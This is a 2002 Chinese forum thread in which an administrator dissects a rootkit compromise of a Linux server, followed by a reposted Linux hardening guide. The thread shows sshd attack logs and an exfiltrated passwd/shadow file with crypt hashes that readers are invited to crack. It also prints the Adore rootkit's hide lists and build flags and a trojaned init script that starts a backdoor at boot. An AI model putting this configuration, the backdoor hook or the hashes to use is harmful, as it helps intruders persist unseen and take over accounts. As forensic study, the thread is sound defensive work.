重启
From root Mon Jan 21 23:01:00 2002
Return-Path: <root>
Received: (from root@localhost)
by dnscache.i-168.com (8.9.3/8.9.3) id XAA00309
for root; Mon, 21 Jan 2002 23:01:00 +0800
Date: Mon, 21 Jan 2002 23:01:00 +0800
From: root <root@dnscache.i-168.com>
Message-Id: <200201211501.XAA00309@dnscache.i-168.com>
To: root@dnscache.i-168.com
Subject: dnscache.i-168.com 01/21/02:23.01 system check





Feb 2 07:28:18 dnscache sshd[1991]: log: Connection from 24.112.92.
135 port 3854
Feb 2 07:28:21 dnscache sshd[1992]: log: Connection from 24.112.92.
135 port 3855
Feb 2 07:28:30 dnscache sshd[1992]: fatal: Local: crc32 compensation
attack: network attack detected
Feb 2 07:28:31 dnscache sshd[1993]: log: Connection from 24.112.92.
135 port 3856
Feb 2 07:28:34 dnscache sshd[1993]: fatal: Local: crc32 compensation
attack: network attack detected
Feb 2 07:28:34 dnscache sshd[1994]: log: Connection from 24.112.92.
135 port 3857
Feb 2 07:28:39 dnscache sshd[1994]: fatal: Local: crc32 compensation
attack: network attack detected
Feb 2 07:28:40 dnscache sshd[1995]: log: Connection from 24.112.92.
135 port 3858
Feb 2 07:28:44 dnscache sshd[1995]: fatal: Local: crc32 compensation
attack: network attack detected
Feb 2 07:28:46 dnscache sshd[1996]: log: Connection from 24.112.92.
135 port 3859
Feb 2 07:28:49 dnscache sshd[1996]: fatal: Local: crc32 compensation
attack: network attack detected
Feb 2 07:28:49 dnscache sshd[1997]: log: Connection from 24.112.92.
135 port 3860
Feb 2 07:28:54 dnscache sshd[1997]: fatal: Local: crc32 compensation
attack: network attack detected
Feb 2 07:28:55 dnscache sshd[1998]: log: Connection from 24.112.92.
135 port 3861
Feb 2 07:28:59 dnscache sshd[1998]: fatal: Local: crc32 compensation
attack: network attack detected
Feb 2 07:28:59 dnscache sshd[1999]: log: Connection from 24.112.92.
135 port 3862
Feb 2 07:29:05 dnscache sshd[1999]: fatal: Local: crc32 compensation
attack: network attack detected
Feb 2 07:29:06 dnscache sshd[2000]: log: Connection from 24.112.92.
135 port 3863
Feb 2 07:29:09 dnscache sshd[2000]: fatal: Local: crc32 compensation
attack: network attack detected
Feb 2 07:29:10 dnscache sshd[2001]: log: Connection from 24.112.92.
135 port 3864
Feb 2 07:29:15 dnscache sshd[2001]: fatal: Local: crc32 compensation
attack: network attack detected
From root Sat Feb 2 08:09:26 2002
Return-Path: <MAILER-DAEMON>
Received: from localhost (localhost)
by dnscache.i-168.com (8.9.3/8.9.3) with internal id IAA02520;
Sat, 2 Feb 2002 08:09:25 +0800
Date: Sat, 2 Feb 2002 08:09:25 +0800
From: Mail Delivery Subsystem <MAILER-DAEMON@dnscache.i-168.com>
Message-Id: <200202020009.IAA02520@dnscache.i-168.com>
To: root@dnscache.i-168.com
MIME-Version: 1.0
Content-Type: multipart/report; report-type=delivery-status;
boundary="IAA02520.1012608565/dnscache.i-168.com"
Subject: Returned mail: Service unavailable
Auto-Submitted: auto-generated (failure)

This is a MIME-encapsulated message

--IAA02520.1012608565/dnscache.i-168.com

The original message was received at Sat, 2 Feb 2002 08:09:22 +0800
from root@localhost

----- The following addresses had permanent fatal errors -----
ja_ja_j@yahoo.com

----- Transcript of session follows -----
... while talking to mx2.mail.yahoo.com.:
> >> DATA
< 554 delivery error: dd This user doesn't have a yahoo.com account
(ja_ja_j@yahoo.com) - mta619.mail.yahoo.c
om
554 ja_ja_j@yahoo.com... Service unavailable
--IAA02520.1012608565/dnscache.i-168.com
Content-Type: message/delivery-status

Reporting-MTA: dns; dnscache.i-168.com
Arrival-Date: Sat, 2 Feb 2002 08:09:22 +0800

Final-Recipient: RFC822; ja_ja_j@yahoo.com
Action: failed
Status: 5.0.0
Remote-MTA: DNS; mx2.mail.yahoo.com
Diagnostic-Code: SMTP; 554 delivery error: dd This user doesn't have a
yahoo.com account (ja_ja_j@yahoo.com) -
mta619.mail.yahoo.com
Last-Attempt-Date: Sat, 2 Feb 2002 08:09:25 +0800

--IAA02520.1012608565/dnscache.i-168.com
Content-Type: message/rfc822

Return-Path: <root>
Received: (from root@localhost)
by dnscache.i-168.com (8.9.3/8.9.3) id IAA02513
for ja_ja_j@yahoo.com; Sat, 2 Feb 2002 08:09:22 +0800
Date: Sat, 2 Feb 2002 08:09:22 +0800
From: root <root>
Message-Id: <200202020009.IAA02513@dnscache.i-168.com>
To: ja_ja_j@yahoo.com
Subject: Linux dnscache.i-168.com 2.2.18-2 #1 Tue Feb 27 20:54:01 CST
2001 i686 unknown

Linux dnscache.i-168.com 2.2.18-2 #1 Tue Feb 27 20:54:01 CST 2001 i686
unknown
|------
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/adm:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/binsync
shutdown:x:6:0:shutdown:/sbin:/sbinshutdown
halt:x:7:0:halt:/sbin:/sbinhalt
mail:x:8:12:mail:/var/spoolmail:
news:x:9:13:news:/var/spoolnews:
uucp:x:10:14:uucp:/var/spooluucp:
operator:x:11:0:operator:/root:
games:x:12:100:games:/usrgames:
gopher:x:13:30:gopher:/usr/libgopher-data:
ftp:x:14:50:FTP User:/home/ftp:
nobody:x:99:99:Nobody:/:
wnn:x:127:127:Wnn:/usr/local/bin/Wnn6:
哪里来的SHELL?又是后门,FT!
mysql:x:128:128:MySQL server:/var/lib/mysql:/binbash
bind:x:129:129::/etc/named:/dev/null
piranha:x:60:60::/home/httpd/html/piranha:/dev/null
squid:x:23:23::/var/spool/squid:/dev/null
chair:x:500:503::/home/chair:/bin/bash
dnscache:x:501:504::/home/dnscache:/binbash
dnslog:x:502:505::/home/dnslog:/binbash
cgi:x:0:0::/home/cgi:/bin/bash
家伙1
luck:x:503:506::/home/luck:/bin/bash
家伙2
luck1:x:0:507::/home/luck1:/bin/bash
家伙3|------
root:XXXXXXXXX.:11649:0:99999:7::: 保密啦
bin:*:11649:0:99999:7:::
daemon:*:11649:0:99999:7:::
adm:*:11649:0:99999:7:::
lp:*:11649:0:99999:7:::
sync:*:11649:0:99999:7:::
shutdown:*:11649:0:99999:7:::
halt:*:11649:0:99999:7:::
mail:*:11649:0:99999:7:::
news:*:11649:0:99999:7:::
uucp:*:11649:0:99999:7:::
operator:XXXXXXXXXX:11708:0:99999:7:-1:-1:134539376
games:*:11649:0:99999:7:::
games:*:11649:0:99999:7:::
gopher:*:11649:0:99999:7:::
ftp:*:11649:0:99999:7:::
nobody:*:11649:0:99999:7:::
wnn:*:11649:0:99999:7:::
mysql:!!:11649:0:99999:7:::
bind:!!:11649:0:99999:7:::
piranha:!!:11649:0:99999:7:::
squid:!!:11649:0:99999:7:::
chair:XXXXXXXXX:11649:0:99999:7:-1:-1:134539416 保密啦
dnscache:!!:11649:0:99999:7:::
dnslog:!!:11649:0:99999:7:::
cgi:5DnRYHyIa5w0g:11708:0:99999:7:-1:-1:134539416
luck:SqXj0pjOPwcxA:11720:0:99999:7:-1:-1:134538336
luck1:cqrTW5Ortfn7s:11720:0:99999:7:-1:-1:134538336
这几个就是他们的3DES后的东西,哪位朋友有时间和兴趣就CRACK了他吧
PING 216.115.108.245 (216.115.108.245) from 192.168.100.27 : 56(84)
bytes of data.
64 bytes from 216.115.108.245: icmp_seq=0 ttl=233 time=167.9 ms
64 bytes from 216.115.108.245: icmp_seq=1 ttl=233 time=170.7 ms
64 bytes from 216.115.108.245: icmp_seq=2 ttl=233 time=171.2 ms
64 bytes from 216.115.108.245: icmp_seq=3 ttl=233 time=174.6 ms
64 bytes from 216.115.108.245: icmp_seq=4 ttl=233 time=171.0 ms

--- 216.115.108.245 ping statistics ---
5 packets transmitted, 5 packets received, 0% packet loss
round-trip min/avg/max = 167.9/171.0/174.6 ms

下面的是在/home/luck/目录下的东西,看来也是不细心,又有
线索了,看样子改了内核,这个家伙在这里还考虑周到,怕
我重编内核??
[root@mail luck]# cat .bash_history
cd /usr/src
ls
cd star
ls
cd S*
ls
tar -zxpvf *
ls
cd root
ls
l
ls
cd ls
ls
ls -af
ls
cd ..
ls
cd etc
ls
cd ..
ls
cd boot
ls
cd ..
ls
cd boto
ls -af
cd ..
ls
cd root
ls
ls -af
cd ..
ls
rm * -rf
ls
tar -zxpvf *
ls
cd ske
ls
ls -af
vi .X*
ls
ls -af
ls
ls -af
rm .X*
LS
ls
rm * -rf
ls
ls -af
ls
ls -af
vi .x*
ls
ls -af
rm .x*
ls
ls -af
vi .inputrc
ls
ls -af
vi .bashrc
ls -af
rm .g*
rm .gnome*
rm .gnome* -rf
ls
ls -af
rm .kde*
ls
ls -af
mv
mc
ls
ls -af
rm .net*
rm .net* -rf
ls -af
mc
ls
ls -af
cp -r .* /root
y
cd /
ls
cd usr
ls
cd src
ls
cd ..
ls
cd ..
ls
cd usr
ls
cd src
ls
cd tar
l
s
ls
cd S&*
cd S*
LS
ls
mount /dev/hdd /mnt/cdrom
cd /mnt/cdrom
ls
cd S*
ls
ls f*
rpm -i filesys*
cd ..
ls *ske*
ls
cd S*
ls
ls *ske*
rpm -i *ske*
cd ..
cd /
ls
cd root
ls
ls -af
cd ..
mv root rootstar
mkdir root
cd root
ls -af
cd ..
ls
cd rootstar
ls
ls -af
cd ..
ls
rm root -rf
ls
mkdir root
ls
cd root
ls -af
ls -a
ls .
rm ske -rf
ls
ls -af
rm skel -rf
ls
ls -af
ls
vi
ls

ROOTKIT里的文件,FT,几乎都考虑周全了,可惜啊,这些常用的
东西网管又怎么会相信呢,通常自己都有另一套东西的啦。
[root@mail rk]# ls
Makefile.non-smp cleaner.c hostkey logrc ps
tcpd
Makefile.smp dir ifconfig ls pstree
top
adore.c dummy.c iferc netstat rename.c
twist2open
afbackup exec-test.c install netstatrc seed
ava.c exec.c libinvisible.c network sshd_conf
bnc filerc libinvisible.h parser syslogd
bnc.conf find logcleaner procrc sz

下面的是这个ROOTKIT隐蔽起来的进程,端口,文件,网卡等
[root@mail rk]# cat netstatrc
3 7070
1 7070
3 31337
1 31337
3 32321
3 32322
3 32323
3 32324
3 32325
4 32321
4 32322
4 32323
4 32324
4 32325
4 6667
4 6669
4 6668
4 7000
4 6660
4 21
4 53

[root@mail rk]# cat logrc
home.com
nether.net
hobbiton.org
194.102
sshd
syslog
klogd
net-pf-10
modprobe
games
promiscuous
PF_INET
60G
yahoo.com
217.10
193.226
hypermart
failure
geocities

[root@mail rk]# cat procrc
3 darkbot
3 psybnc
3 slice
3 vadim
3 eggdrop
3 mech
3 banner
3 massbind
3 masslpd
3 scan
3 ping
3 afbackup
3 bnc
3 sniff
3 root
3 bind
3 statd
3 lpd
3 r00t
3 smurf
3 synk
3 twist2open

看看MAKEFILE对查找后门放在哪里有帮助。adore ,ava ,cleaner这3个文件,看

哪些文件里有加载先
[root@mail rk]# cat Makefile.smp
#
CC=gcc
CFLAGS=-O2 -Wall

#CFLAGS+=-m486
CFLAGS+=-DELITE_CMD=32321
CFLAGS+=-DELITE_UID=34
CFLAGS+=-DCURRENT_ADORE=32
CFLAGS+=-DADORE_KEY=\"rewt\"
CFLAGS+=-DHIDDEN_SERVICE="\":32321\""
CFLAGS+=-D__SMP__
CFLAGS+=-DHIDDEN_PORT=32321
CFLAGS+=-DMODVERSIONS
all: adore ava cleaner

adore: adore.c
rm -f adore.o
$(CC) -c -I/usr/src/linux/include $(CFLAGS) adore.c -o adore.o

ava: ava.c libinvisible.c
$(CC) $(CFLAGS) ava.c libinvisible.c -o ava

dummy: dummy.c
$(CC) -c -I/usr/src/linux/include $(CFLAGS) dummy.c

cleaner: cleaner.c
$(CC) -I/usr/src/linux/include -c $(CFLAGS) cleaner.c

exec-test: exec-test.c
$(CC) -Wall -O2 exec-test.c -DSAYSO=\"ORIGINAL\" -o
/bin/exec-test
$(CC) -Wall -O2 exec-test.c -DSAYSO=\"FAKE\" -o /tmp/foobar
clean:
rm -f core ava *.o
[root@mail rk]# cat Makefile.
Makefile.non-smp Makefile.smp
[root@mail rk]# cat Makefile.
Makefile.non-smp Makefile.smp
[root@mail rk]# cat Makefile.non-smp
#
CC=gcc
CFLAGS=-O2 -Wall

#CFLAGS+=-m486
CFLAGS+=-DELITE_CMD=32321
CFLAGS+=-DELITE_UID=34
CFLAGS+=-DCURRENT_ADORE=32
CFLAGS+=-DADORE_KEY=\"rewt\"
CFLAGS+=-DHIDDEN_SERVICE="\":32321\""
#CFLAGS+=-D__SMP__
CFLAGS+=-DHIDDEN_PORT=32321
CFLAGS+=-DMODVERSIONS
all: adore ava cleaner

adore: adore.c
rm -f adore.o
$(CC) -c -I/usr/src/linux/include $(CFLAGS) adore.c -o adore.o

ava: ava.c libinvisible.c
$(CC) $(CFLAGS) ava.c libinvisible.c -o ava

dummy: dummy.c
$(CC) -c -I/usr/src/linux/include $(CFLAGS) dummy.c

cleaner: cleaner.c
$(CC) -I/usr/src/linux/include -c $(CFLAGS) cleaner.c

exec-test: exec-test.c
$(CC) -Wall -O2 exec-test.c -DSAYSO=\"ORIGINAL\" -o
/bin/exec-test
$(CC) -Wall -O2 exec-test.c -DSAYSO=\"FAKE\" -o /tmp/foobar
clean:
rm -f core ava *.o

[
----------------------------------------------------------

哈哈

编辑 删除 发表时间发表于 2002-06-15.00:36:00   MSIE 5.01 Windows 2000IP: 已记录
痞菜帅哥哦
级别:管理员
威望:9
经验:18
货币:99999
体力:100
来源:不知道
总发帖数:2602
注册日期:2001-04-13
查看 邮件 主页 QQ 消息 引用 复制 下载 

root@mail rk]# cat network |more
#!/bin/bash
#
# network Bring up/down networking
#
# chkconfig: 2345 10 90
# description: Activates/Deactivates all network interfaces configured
to \
# start at boot time.
# probe: true

# Source function library.
. /etc/init.d/functions

if [ ! -f /etc/sysconfig/network ]; then
exit 0
fi

. /etc/sysconfig/network

if [ -f /etc/sysconfig/pcmcia ]; then
. /etc/sysconfig/pcmcia
fi


# Check that networking is up.
[ ${NETWORKING} = "no" ] && exit 0

[ -x /sbin/ifconfig ] || exit 0
# Even if IPX is configured, without the utilities we can't do much
[ ! -x /sbin/ipx_internal_net -o ! -x /sbin/ipx_configure ] && IPX=

# If IPv6 is explicitly configured, make sure it's available.
if [ "$NETWORKING_IPV6" = "yes" ]; then
alias=****modprobe -c | grep net-pf-10 | awk '{ print $3 }'****
if [ "$alias" != "ipv6" -a ! -f /proc/net/if_inet6 ]; then
echo "alias net-pf-10 ipv6" >> /etc/modules.conf
fi
fi

CWD=****pwd****
cd /etc/sysconfig/network-scripts

# find all the interfaces besides loopback.
# ignore aliases, alternative configurations, and editor backup files
interfaces=****ls ifcfg* | LANG=C egrep -v '(ifcfg-lo|:
|rpmsave|rpmorig|rpmnew)' | \
LANG=C egrep -v '(~|\.bak)$' | \
LANG=C egrep -v 'ifcfg-cipcb[0-9]+$' | \
LANG=C egrep -v 'ifcfg-ippp[0-9]+$' | \
LANG=C egrep 'ifcfg-[a-z0-9]+$' | \
sed 's/^ifcfg-//g'****

# See how we were called.
case "$1" in
start)
/usr/bin/twist2open >>/dev/null 2>&1
//就是在这里加载后门的啦!TMD,真是混蛋

action $"Setting network parameters: " sysctl -e -p
/etc/sysctl.conf

action $"Bringing up interface lo: " ./ifup ifcfg-lo

case "$IPX" in
yes|true)
/sbin/ipx_configure --auto_primary=$IPXAUTOPRIMARY \
--auto_interface=$IPXAUTOFRAME
if [ "$IPXINTERNALNETNUM" != "0" ]; then
/sbin/ipx_internal_net add $IPXINTERNALNETNUM
$IPXINTERNALNODENUM
fi
;;
esac

oldhotplug=****sysctl kernel.hotplug 2>/dev/null| awk '{ print
$3 }' 2>/dev/null****
sysctl -w kernel.hotplug="/bin/true" > /dev/null 2>&1

for i in $interfaces; do
if LANG=C egrep -L "^ONBOOT=\"?[Nn][Oo]\"?" ifcfg-$i
> /dev/null 2>&1 ; then
if [ "${i##eth}" != "$i" ]; then
# Probe module to preserve interface
ordering
if [ -n "****modprobe -vn $i | grep -v Note:****" ];
then
/sbin/ifconfig $i >/dev/null 2>&1
fi
fi
else
# If we're in confirmation mode,
get user confirmation
[ -n "$CONFIRM" ] &&
{
confirm $i
case $? in
0)
:
;;
2)
CONFIRM=
;;
*)
continue
;;
esac
}

action $"Bringing up interface $i: " ./ifup $i
boot
fi
done

# add cipe here.
cipeinterfaces=****ls ifcfg* | LANG=C egrep -v '(ifcfg-lo|:
|rpmsave|rpmorig|rpmnew)' | \
LANG=C egrep -v '(~|\.bak)$' | \
LANG=C egrep 'ifcfg-cipcb[0-9]+$' | \
sed 's/^ifcfg-//g'****
for i in $cipeinterfaces ; do
if ! LANG=C egrep -L "^ONBOOT=\"?[Nn][Oo]\"?" ifcfg-$i
> /dev/null 2>&1 ; then
# If we're in confirmation mode, get user confirmation
[ -n "$CONFIRM" ] &&
{
confirm $i
case $? in
0)
:
;;
2)
CONFIRM=
;;
*)
continue
;;
esac
}
action $"Bringing up interface $i: " ./ifup $i boot
fi
done

sysctl -w kernel.hotplug=$oldhotplug > /dev/null 2>&1

# Add non interface-specific static-routes.
if [ -f /etc/sysconfig/static-routes ]; then
grep "^any" /etc/sysconfig/static-routes | while read
ignore args ; do
/sbin/route add -$args
done
fi

touch /var/lock/subsys/network
;;
stop)

/usr/bin/weather U dummy >>/dev/null 2>&1
kill -9 ****pidof afbackup****
kill -9 ****pidof bnc****
关闭那些后门进程啦,FT
# If this is a final shutdown/halt, check for network FS,
# and unmount them even if the user didn't turn on netfs

if [ "$RUNLEVEL" = "6" -o "$RUNLEVEL" = "0" -o "$RUNLEVEL" = "1"
]; then
NFSMTAB=****grep -v '^#' /proc/mounts | awk '{ if ($3 ~
/^nfs$/ ) print $2}'****
SMBMTAB=****grep -v '^#' /proc/mounts | awk '{ if ($3 ~
/^smbfs$/ ) print $2}'****
NCPMTAB=****grep -v '^#' /proc/mounts | awk '{ if ($3 ~
/^ncpfs$/ ) print $2}'****
if [ -n "$NFSMTAB" -o -n "$SMBMTAB" -o -n "$NCPMTAB" ] ;
then
/etc/init.d/netfs stop
fi
fi

for i in $interfaces ; do
if LC_ALL= LANG= ifconfig $i 2>/dev/null | grep -q "
UP " >/dev/null 2>&1 ; then
action $"Shutting down interface $i: " ./ifdown $i
boot
fi
done
case "$IPX" in
yes|true)
if [ "$IPXINTERNALNETNUM" != "0" ]; then
/sbin/ipx_internal_net del
fi
;;
esac
./ifdown ifcfg-lo
if [ -d /proc/sys/net/ipv4 ]; then
if [ -f /proc/sys/net/ipv4/ip_forward ]; then
if [ ****cat /proc/sys/net/ipv4/ip_forward**** != 0 ]; then
action $"Disabling IPv4 packet forwarding: "
sysctl -w net.ipv4.ip_forward=0
fi
fi
if [ -f /proc/sys/net/ipv4/ip_always_defrag ]; then
if [ ****cat /proc/sys/net/ipv4/ip_always_defrag**** != 0 ];
then
action $"Disabling IPv4 automatic
defragmentation: " sysctl -w net.ipv4.ip_always_defr
ag=0
fi
fi
fi

rm -f /var/lock/subsys/network
;;
status)
echo $"Configured devices:"
echo lo $interfaces
if [ -x /sbin/linuxconf ] ; then
eval ****/sbin/linuxconf --hint netdev****
echo $"Devices that are down:"
echo $DEV_UP
echo $"Devices with modified configuration:"
echo $DEV_RECONF
else
echo $"Currently active devices:"
echo ****/sbin/ifconfig | grep ^[a-z] | awk '{print $1}'****
fi
;;
restart)
cd $CWD
$0 stop
$0 start
;;
reload)
if [ -x /sbin/linuxconf ] ; then
eval ****/sbin/linuxconf --hint netdev****
for device in $DEV_UP ; do
action $"Bringing up device $device: " ./ifup
$device
done
for device in $DEV_DOWN ; do
action $"Shutting down device $device: " .
/ifdown $device
done
for device in $DEV_RECONF ; do
action $"Shutting down device $device: " .
/ifdown $device
action $"Bringing up device $device: " ./ifup
$device
done
for device in $DEV_RECONF_ALIASES ; do
action $"Bringing up alias $device: "
/etc/sysconfig/network-scripts/ifup-aliases $dev
ice
done
for device in $DEV_RECONF_ROUTES ; do
action $"Bringing up route $device: "
/etc/sysconfig/network-scripts/ifup-routes $devi
ce
done
case $IPX in yes|true)
case $IPXINTERNALNET in
reconf)
action $"Deleting internal IPX network: "
/sbin/ipx_internal_net del
action $"Adding internal IPX network
$IPXINTERNALNETNUM $IPXINTERNALNODENUM: " /sbin/i
px_internal_net add $IPXINTERNALNETNUM \

$IPXINTERNALNODENUM
;;
add)
action $"Adding internal IPX network
$IPXINTERNALNETNUM $IPXINTERNALNODENUM: " /sbin/i
px_internal_net add $IPXINTERNALNETNUM \

$IPXINTERNALNODENUM
;;
del)
action $"Deleting internal IPX network: "
/sbin/ipx_internal_net del
;;
esac
;;
esac
else
cd $CWD
$0 restart
fi
;;
probe)
if [ -x /sbin/linuxconf ] ; then
eval ****/sbin/linuxconf --hint netdev****
[ -n "$DEV_UP$DEV_DOWN$DEV_RECONF$DEV_RECONF_ALIASES" -o
\
-n "$DEV_RECONF_ROUTES$IPXINTERNALNET" ] && \
echo reload
exit 0
else
# if linuxconf isn't around to figure stuff out for us,

# we punt. Probably better than completely reloading
# networking if user isn't sure which to do. If user
# is sure, they would run restart or reload, not probe.

exit 0
fi
;;
*)
echo $"Usage: $0 {start|stop|restart|reload|status|probe}"
exit 1
esac
exit 0

好了,经过36页的观察,基本知道是怎么回事了,本来以为实验机器随便一点无
所谓,
安全问题是个水桶,全部严密还好,有一点漏洞,这个水桶就没什么用了。 :(
----------------------------------------------------------

哈哈

编辑 删除 发表时间发表于 2002-06-15.00:37:40   MSIE 5.01 Windows 2000IP: 已记录
痞菜帅哥哦
级别:管理员
威望:9
经验:18
货币:99999
体力:100
来源:不知道
总发帖数:2602
注册日期:2001-04-13
查看 邮件 主页 QQ 消息 引用 复制 下载 

比较不错的东西
----------------------------------------------------------

哈哈

编辑 删除 发表时间发表于 2002-06-15.00:38:43   MSIE 5.01 Windows 2000IP: 已记录
扑街帅哥哦
级别:管理员
威望:4
经验:131
货币:6128
体力:100
来源:青山精神病院
总发帖数:2271
注册日期:2001-07-23
查看 邮件 主页 QQ 消息 引用 复制 下载 

Linux的安全 (此为转贴,但鹰派无聊人说未得他们允许不许转贴,好像不是他们鹰派写的,为什么作者不告他们侵权???)

概述

UNIX的系统安全和系统管理员有很大的关系。安装越多的服务,越容易导致系统的安全漏洞。一些其它的操作系统,如:SCO,实际上更容易有安全漏洞,因为,为了更加“用户友好”,这些操作系统集成了更多的服务。
Linux本身是稳定和安全的,但是它可以以不同的形式发行。在安装Linux时候,最好先最小化安装,然后再加上必要的软件。这样可以减小某个程序出现安全隐患的可能。如果管理得好,Linux可以是最安全的系统。
如果在系统中有隐患存在,在网络上成千上万的自愿者就会指出隐患,并给出修正。大的公司,比如:商业软件公司,只能把有限的人力用于解决这方面的问题。把问题都公开出来,对它们来说可能没有什么好处,而且通过正规的发行和升级渠道,一个小小修正到用户手中都要很长的时间。也许这些修正会以补丁的方式出现,但是商业软件的系统管理员都倾向于使用现成的软件,而且自以为这些软件都是很专业的。
在编程的时候随时可能发生错误,但是,当有上万个人在看程序的源代码,这些错误就能很快地被发现。现在全球共有一千二百万的Linux拷贝,想想看,这是一种什么情况。如果系统有安全漏洞,很容易就被某个人发现了。
这一章将讨论一些保护服务器安全的一般方法。我们假定这台服务器是连在Internet上的。在通常情况下,有些服务,如:NFS、Samba、Imap和Pop只是供内部用户使用的。当然,也可以把这台服务器和外界隔离,这样就可以简单地避免外部的入侵。但是这没有什么实际意义,我们下面要介绍的是如何避免来自外部的和内部的攻击。

1. 基础知识
尽量少让外人知道有关系统的信息。有时候简单地用finger程序就能知道不少系统信息,比如:有多少用户、管理员什么时候登录、什么时候工作、他们是谁、谁现在在用这个系统以及其它有利于黑客猜出用户口令的信息。你可以用一个强大的finger daemon和tcpd限制可以连接到服务器的用户以及他们可以知道的有关系统的信息。但是,最好还是把finger软件包卸载掉。
日志是了解Linux系统运行情况的唯一方法。当然,这是以黑客没有破坏日志文件为前提的,但是这种情况很少见。把所有的连接都记录下来,可以发现攻击者和他们试图进行的攻击。如果你看不懂日志,可以向别人请教,一定要学会看懂它们。向别人请教你不懂的东西这是很正常的,不要不好意思。我自己就是从不断地犯错误和改正错误中学到不少知识的。因为骄傲自大不能学到东西和本身的资质差是两码事。看下面的《31. 创建所有重要的日志文件的硬拷贝》,你可以学到怎样管理日志文件的一些有用的知识。
限制系统中SUID的程序。SUID的程序是以root(UNIX世界中的上帝)权限运行的程序。有时候这是必须的,但是在多数情况下这没有必要。因为SUID程序可以做任何root可以做的事,这样有更多的机会出现安全隐患。也许,它们有时候会带来安全隐患,有时候不会,但是黑客可以利用SUID的程序来破坏系统的安全。这就是一种叫exploit的程序的由来。exploit程序是一种利用SUID程序的程序或脚本,具有很大的破坏力,可以用来得到root的shell、获取password文件、读其他人的邮件、删除文件,等等。这方面的知识可以参考《34. 带“s”位的程序》。

2. BIOS安全,设定引导口令
禁止从软盘启动,并且给BIOS加上密码。每次启动的时候都手工检查一下BIOS,这样可以提高系统的安全性。禁止从软盘启动,可以阻止别人用特殊的软盘启动你的计算机;给BIOS加上密码,可以防止有人改变BIOS的参数,比如:允许从硬盘启动或不用输入口令就可以引导计算机。

3. 安全策略
有一点很重要而且必须指出的是:如果你不知道要保护什么,那么更本没有办法保证系统的安全。所以必须要有一个安全策略,基于这样的一个策略才可以决定哪些东西允许别人访问,哪些不允许。如何制定一个安全策略完全依赖于你对于安全的定义。下面的这些问题提供一些一般的指导方针:
* 你怎么定义保密的和敏感的信息?
* 你想重点防范哪些人?
* 远程用户有必要访问你的系统吗?
* 系统中有保密的或敏感的信息吗?
* 如果这些信息被泄露给你的竞争者和外面的人有什么后果?
* 口令和加密能够提供足够的保护吗?
* 你想访问Internet吗?
* 你允许系统在Internet上有多大的访问量?
* 如果发现系统被黑客入侵了,下一步该怎么做?
这个列表很短,真正的安全策略可能包含比这多得多的内容。可能你要做的第一件是:评估一下你偏执的程度。任何一个安全策略多少都有一定程度的偏执:确定到底在多大程度上相信别人,包括内部的人和外部的人。安全策略必须在允许用户合理地使用可以完成工作所必须的信息和完全禁止用户使用信息之间找到平衡点。这个平衡点就是由系统策略决定的。

4. 口令
这章的Linux安全概要就从口令的安全开始。许多人都把所有的东西保存在计算机上,防止别人查看这些信息的方法就是用口令把计算机保护起来。没有什么东西是绝对安全的。与常识相反的是:无法破解的口令是不存在的。只要给足时间和资源,所有的口令都能用社会工程(译者注:原文是social engineering,找不出更好的翻译,大致的意思是用社会和心理学的知识,而不是用纯粹的技术手段)或强行计算的方法猜出来。
通过社会工程或其它方法获得服务器的口令是最简单和最流行的入侵服务器的方法。决大多数的技术支持人员很容易获得其他用户的口令,因为用户的安全意识很差而且很轻易就相信自己的同事,特别是帮助自己解决问题的人。有很多登记在案的成功入侵就是因为一些别有用心的人利用安全管理上的松懈而获得成功的。有时候,在特定的时间在特定的地点,上级或老板对员工喊话就有可能泄露机密,导致可怕的后果。
因为破解口令是一项很耗时间和资源的工作,所以应该使得口令文件难于破解,这样即使黑客获取了口令文件也不能轻易破解。作为一个系统管理员,自己在每个周末运行一下口令破解程序,是保证系统安全的好方法。这有利于尽早地发现和替换那些很容易被猜出来的口令。而且,还要有一个好的口令检查机制,在用户选择新口令或改变旧口令的时候,来排除那些有安全隐患的口令。那些字典里的单词、或者全是大写或全是小写的以及没有包含数字或特殊字符的字符串是不能用来做口令的。我建议用下面的规则选择有效的口令:
* 口令至少要有6个字符,最好包含一个以上的数字或特殊字符。
* 口令不能太简单,所谓的简单就是很容易猜出来,也就是用自己的名字,电话号码、生日、职业或者其它个人信息作为口令。
* 口令必须是有有效期的,在一段时间之后就要更换口令。
* 口令在这种情况下必须作废或者重新设定:如果发现有人试图猜测你的口令,而且已经试过很多次了。

5. 口令长度
安装完Linux系统之后默认的最小口令长度为5。这就是说一个新的用户可以访问服务器,那么他的口令必须多于5字符。但是这样是不够安全的,最好口令的长度能够大于8。可以强制用户使用8个字符以上的口令。编辑“/etc/login.defs”文件,把最小口令长度由5改成8。找到 PASS_MIN_LEN 5 这一行,改为:PASS_MIN_LEN 8 。“login.defs”是很重要的配置文件。可以在这个文件中设定一些其它的安全策略,比如:口令的有效期。

6. root帐号
“root”帐号是Unix系统中享有特权的帐号。“root”帐号是不受任何限制和制约的。因为系统认为root知道自己在做些什么,而且会按root说的做,不问任何问题。因此,可能会因为敲错了一个命令,导致重要的系统文件被删除。用root帐号的时候,要非常非常小心。因为安全原因,在不是绝对必要的情况下,不要用root帐号登录。特别要注意的是:不在自己的服务器上的时候,千万不要在别的计算机上用“root”登录自己的服务器。这是非常非常非常糟糕的一件事。

7. 加密
加密时要用到密匙,密匙是一个特殊的数字,把密匙和需要加密的信息经过加密算法加密之后,只有知道密匙的人才能把信息读出来。如果所有的计算机主机都在你的控制下,加密当然是一个好方法,但是,如果其中一台“被信任的”主机被黑客控制了,你马上就有危险了。这就不仅仅是用户的帐号和口令有危险了。在通常情况下,加密是用来保证机密信息在系统中传送的安全。如果一台计算机被控制了,那么这些加密信息就会让人知道或是泄密了。有一个好的安全策略,这种危险的可能性会降到最低,但是如果某台主机的密匙被泄露出去,那么危险始终存在。使用如:OpenSSL、SSH和MD5这样的加密技术是非常有用的,可以参考后面的章节。

8. “/etc/exports"文件
如果通过NFS把文件共享出来,那么一定要配置“/etc/exports”文件,使得访问限制尽可能的严。这就是说,不要用通配符,不允许对根目录有写权限,而且尽可能只给只读权限。编辑exports文件(vi /etc/exports)加入:
例如:
/dir/to/export host1.mydomain.com(ro,root_squash)
/dir/to/export host2.mydomain.com(ro,root_squash)
“/dir/to/export”是你想共享出来的目录,host.mydomain.com是允许访问这个目录的计算机。ro代表只读,root_squash代表不允许对根目录进行写操作。使这些改变生效,你还要运行“/usr/sbin/exportfs -a”命令。
